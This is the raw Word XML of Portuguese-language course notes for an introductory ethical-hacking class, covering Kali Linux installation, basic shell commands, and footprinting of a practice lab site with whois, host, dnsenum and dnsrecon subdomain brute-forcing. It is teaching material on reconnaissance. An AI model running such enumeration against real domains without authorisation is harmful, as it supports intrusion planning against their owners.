          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc156597583"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aula 2 – Instalando o sistema dos hackers – Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="02DDB9CE" w14:textId="0F2DB974" w:rsidR="00DD5858" w:rsidRPr="00711C8C" w:rsidRDefault="00DD5858" w:rsidP="00DD5858">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683051A9" w14:textId="70D0ECBB" w:rsidR="00DD5858" w:rsidRPr="00711C8C" w:rsidRDefault="00AC6C1D" w:rsidP="00DD5858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sudo apt update</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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Para atualizar os repositórios do Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A16C12A" w14:textId="36DFB5F6" w:rsidR="00AC6C1D" w:rsidRPr="00711C8C" w:rsidRDefault="00AC6C1D" w:rsidP="00DD5858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sudo apt upgrade</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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Lista de ferramentas para o kali atualizar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFE7FF" w14:textId="0DE39A30" w:rsidR="001E0B68" w:rsidRPr="00711C8C" w:rsidRDefault="00AC6C1D" w:rsidP="00DD5858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sudo apt dist-upgrade</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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Atualizar o kernel do kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61301D5E" w14:textId="6A79AAB0" w:rsidR="001E0B68" w:rsidRPr="00B007BE" w:rsidRDefault="001E0B68" w:rsidP="001E0B68">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc156597584"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aula 3 – Introdução ao Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="58960943" w14:textId="0EEE3BB1" w:rsidR="001E0B68" w:rsidRPr="00711C8C" w:rsidRDefault="001E0B68" w:rsidP="001E0B68">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BA9597" w14:textId="27F8CC53" w:rsidR="00346637" w:rsidRPr="00711C8C" w:rsidRDefault="00567B9A" w:rsidP="00346637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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/kali/Desktop/test.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>Copia determinado arquivo para a pasta atual onde eu estou usando o “</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC35E94" w14:textId="69F73572" w:rsidR="001440C3" w:rsidRPr="00711C8C" w:rsidRDefault="001440C3" w:rsidP="00346637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 xml:space="preserve">dnsenum </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">--help </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">| grep </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">brute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A resposta do comando dnsenum (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|,</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> usado para pegar o retorno de um comando) vai para o grep (buscador) e acha a palavra brute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AE4D2" w14:textId="7E3A13F1" w:rsidR="001A511E" w:rsidRPr="00B007BE" w:rsidRDefault="00346637" w:rsidP="001A511E">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc156597585"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aula 4 – Footprinting (Coleta de informações)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="151BF492" w14:textId="6C824DCB" w:rsidR="001A511E" w:rsidRPr="00711C8C" w:rsidRDefault="001A511E" w:rsidP="001A511E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DEF4CE5" w14:textId="22378B3E" w:rsidR="001A511E" w:rsidRPr="00711C8C" w:rsidRDefault="00000000" w:rsidP="001A511E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00D63225" w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          </w:rPr>
          <w:t>www.bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D63225" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D63225" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00D63225" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laboratório, site que simula site real para praticar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E5A130" w14:textId="4F659C35" w:rsidR="00D63225" w:rsidRPr="00711C8C" w:rsidRDefault="00D63225" w:rsidP="001A511E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08267B11" w14:textId="66AE5545" w:rsidR="00D63225" w:rsidRPr="00711C8C" w:rsidRDefault="00AD3CA1" w:rsidP="001A511E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- </w:t>
      </w:r>
      <w:r w:rsidR="00D63225" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>Testar funcionalidades da aplicação e ir anotando as possíveis informações em bloco de notas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BC20AB" w14:textId="77777777" w:rsidR="00AD3CA1" w:rsidRPr="00711C8C" w:rsidRDefault="00AD3CA1" w:rsidP="00AD3CA1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- </w:t>
      </w:r>
      <w:r w:rsidR="00D63225" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>Analisar o código fonte e procurar por comentários relevantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC1258" w14:textId="7C79DA33" w:rsidR="006670EC" w:rsidRPr="00711C8C" w:rsidRDefault="00AD3CA1" w:rsidP="00AD3CA1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- Usar bastante </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">descobrir IPs e o seu range da aplicação e dos name-servers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C6AB08" w14:textId="7FA922AE" w:rsidR="00AD3CA1" w:rsidRPr="00711C8C" w:rsidRDefault="00AD3CA1" w:rsidP="001A511E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED75477" w14:textId="77777777" w:rsidR="00F2234A" w:rsidRPr="00711C8C" w:rsidRDefault="00D63225" w:rsidP="001A511E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Fazer enumeração DNS</w:t>
      </w:r>
      <w:r w:rsidR="007C1A10" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C1A10" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="007C1A10" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C475CD" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">São possíveis domínios da aplicação web. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B69CB7" w14:textId="11C50E60" w:rsidR="00CC12BF" w:rsidRPr="00711C8C" w:rsidRDefault="00C475CD" w:rsidP="001A511E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O site </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://who.is</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> irá dar informações sobre o domínio ou pode pôr o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> no Shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCB246" w14:textId="77777777" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="00F2234A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O site </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://registro.br</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> irá dar informações de site terminados em .br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3866D7A4" w14:textId="24313CCE" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD" w:rsidP="009D3EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF67A6A" w14:textId="78459A12" w:rsidR="009D3EFD" w:rsidRPr="00B007BE" w:rsidRDefault="009D3EFD" w:rsidP="007A6108">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc156597586"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Firewalls:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="60C2973F" w14:textId="77777777" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD" w:rsidP="009D3EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C643C7" w14:textId="1CA90702" w:rsidR="00F2234A" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD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Há </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Web Firewalls</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, como o </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cloudfire</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>que quando você faz uma requisição para o site</w:t>
      </w:r>
      <w:r w:rsidR="00D42A43" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>ele filtra e manda para o servidor original do site</w:t>
      </w:r>
      <w:r w:rsidR="00D42A43" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (se o firewall aceitar a requisição), depois o servidor original responde, manda pro </w:t>
      </w:r>
      <w:r w:rsidR="00D42A43" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cloudfire</w:t>
      </w:r>
      <w:r w:rsidR="00D42A43" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e depois manda pro usuário.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B5927" w14:textId="394801C3" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD" w:rsidP="009D3EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A787274" w14:textId="468B7725" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD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Para você saber o IP de um site:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429023DD" w14:textId="3849FB53" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD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ab/>
        <w:t xml:space="preserve">Pode-se usar o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00780E7E" w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00780E7E" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00780E7E" w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00780E7E" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(host</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> te dará mais informações)</w:t>
      </w:r>
      <w:r w:rsidR="007A6108" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AEB95B" w14:textId="085BEA1C" w:rsidR="00D046C8" w:rsidRPr="00711C8C" w:rsidRDefault="00D046C8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ab/>
        <w:t xml:space="preserve">A ferramenta: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dnsenum </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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Irá trazer todos os IPs de uma aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D4C9A" w14:textId="77777777" w:rsidR="008B52DA" w:rsidRPr="00711C8C" w:rsidRDefault="00773423" w:rsidP="008B52DA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ab/>
        <w:t xml:space="preserve">A ferramenta: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dnsrecon</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-d </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F16C3B" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16C3B" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-t </w:t>
      </w:r>
      <w:r w:rsidR="00F16C3B" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>brt (com wordlist</w:t>
      </w:r>
      <w:r w:rsidR="001C629A" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> padrão</w:t>
      </w:r>
      <w:r w:rsidR="00F16C3B" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B87A8F2" w14:textId="5016F8BC" w:rsidR="00773423" w:rsidRPr="00711C8C" w:rsidRDefault="008B52DA" w:rsidP="008B52DA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ab/>
        <w:t xml:space="preserve">A ferramenta: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dnsrecon -d </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w (com wordlist selecionada)</w:t>
      </w:r>
      <w:r w:rsidR="00F16C3B" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00773423" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA62DD2" w14:textId="3138DE9B" w:rsidR="00331B09" w:rsidRPr="00711C8C" w:rsidRDefault="00331B09" w:rsidP="00331B09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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345316A" w14:textId="4C1CAE95" w:rsidR="00331B09" w:rsidRPr="00711C8C" w:rsidRDefault="00331B09" w:rsidP="00331B09">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
